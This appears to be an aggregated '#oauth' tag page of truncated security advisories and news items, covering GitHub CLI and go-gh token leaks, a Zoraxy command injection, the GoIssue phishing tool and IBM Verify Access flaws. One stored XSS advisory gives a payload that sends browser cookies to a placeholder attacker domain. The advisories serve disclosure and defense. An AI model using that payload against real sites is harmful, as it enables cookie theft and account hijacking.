Tag
#oauth
### Summary

A security vulnerability has been identified in the GitHub CLI that could leak authentication tokens when cloning repositories containing `git` submodules hosted outside of GitHub.com and ghe.com.

### Details

This vulnerability stems from several `gh` commands used to clone a repository with submodules from a non-GitHub host, including `gh repo clone`, `gh repo fork`, and `gh pr checkout`. These GitHub CLI commands invoke `git` with instructions to retrieve authentication tokens using the [`credential.helper`](https://git-scm.com/docs/gitcredentials) configuration variable for any host encountered. Prior to `2.63.0`, hosts other than GitHub.com and ghe.com are treated as GitHub Enterprise Server hosts and have tokens sourced from the following environment variables before falling back to host-specific tokens stored within system-specific secured storage:

- `GITHUB_ENTERPRISE_TOKEN`
- `GH_ENTERPRISE_TOKEN`
- `GITHUB_TOKEN` _when the `CODESPACES` environment variable is set_

The...
### Summary

A security vulnerability has been identified in `go-gh` that could leak authentication tokens intended for GitHub hosts to non-GitHub hosts when within a codespace.

### Details

`go-gh` sources authentication tokens from different environment variables depending on the host involved:

- `GITHUB_TOKEN`, `GH_TOKEN` for GitHub.com and ghe.com
- `GITHUB_ENTERPRISE_TOKEN`, `GH_ENTERPRISE_TOKEN` for GitHub Enterprise Server

Prior to `2.11.1`, `auth.TokenForHost` could source a token from the `GITHUB_TOKEN` environment variable for a host other than GitHub.com or ghe.com when [within a codespace](https://github.com/cli/go-gh/blob/71770357e0cb12867d3e3e288854c0aa09d440b7/pkg/auth/auth.go#L73-L77). In `2.11.1`, `auth.TokenForHost` will only source a token from the `GITHUB_TOKEN` environment variable for GitHub.com or ghe.com hosts.

### Impact

Successful exploitation could send an authentication token to an unintended host.

### Remediation and mitigation

1. Upgrade `go-gh` to `...
Amazon Web Services' identity and access management platform has added new features that help developers implement secure, scalable, and customizable authentication solutions for their applications.
A flaw was found in Moodle. Additional checks were required to ensure users can only delete their OAuth2-linked accounts.
More than 3 billion phone coordinates collected by a US data broker expose the detailed movements of US military and intelligence workers in Germany—and the Pentagon is powerless to stop it.
### Summary

A Stored Cross-Site Scripting (XSS) vulnerability in the "Capture Debug Information" page allows authenticated users to inject arbitrary JavaScript through the "hostname" parameter when creating a new device. This vulnerability results in the execution of malicious code when the "Capture Debug Information" page is visited, redirecting the user and sending non-httponly cookies to an attacker-controlled domain.

### Details

When creating a new device, an attacker can inject the following XSS payload into the "hostname" parameter:

```
test'" autofocus onfocus="document.location='https://<attacker_domain>/logger.php?c='+document.cookie"
```

(Note: You may need to URL-encode the '+' sign in the payload.)

The payload triggers automatically when visiting the "Capture Debug Information" page for the device, redirecting the user's browser to the attacker-controlled domain along with any non-httponly cookies. The vulnerability is due to insufficient sanitization of the "url" vari...
### Summary

A command injection vulnerability in the Web SSH feature allows an authenticated attacker to execute arbitrary commands as root on the host.

### Details

Zoraxy has a Web SSH terminal feature that allows authenticated users to connect to SSH servers from their browsers. In [`HandleCreateProxySession`](https://github.com/tobychui/zoraxy/blob/9cb315ea6739d1cc201b690322d25166b12dc5db/src/webssh.go#L19) the request to create an SSH session is handled. After checking for the presence of required parameters, ensuring that the target is not the loopback interface and that there is actually an SSH service running on the target, `CreateNewConnection` is called:

https://github.com/tobychui/zoraxy/blob/e79a70b7acfa45c2445aff9d60e4e7525c89fec8/src/mod/sshprox/sshprox.go#L165-L178

In line 178, the `gotty` binary is executed running `sshCommand` from the line above. It contains the user-controlled variable `connAddr`, which includes the hostname of the SSH server and - if provided - th...
Marketed on a cybercriminal forum, the $700 tool harvests email addresses from public GitHub profiles, priming cyberattackers for further credential theft, malware delivery, OAuth subversion, supply chain attacks, and other corporate breaches.
SlashNext researchers have discovered a new, sophisticated phishing tool GoIssue targeting GitHub developers. Learn about its capabilities, the…
IBM Security Verify Access versions prior to 10.0.8 suffer from authentication bypass, reuse of private keys, local privilege escalation, weak settings, outdated libraries, missing password, hardcoded secrets, remote code execution, missing authentication, null pointer dereference, and lack of privilege separation vulnerabilities.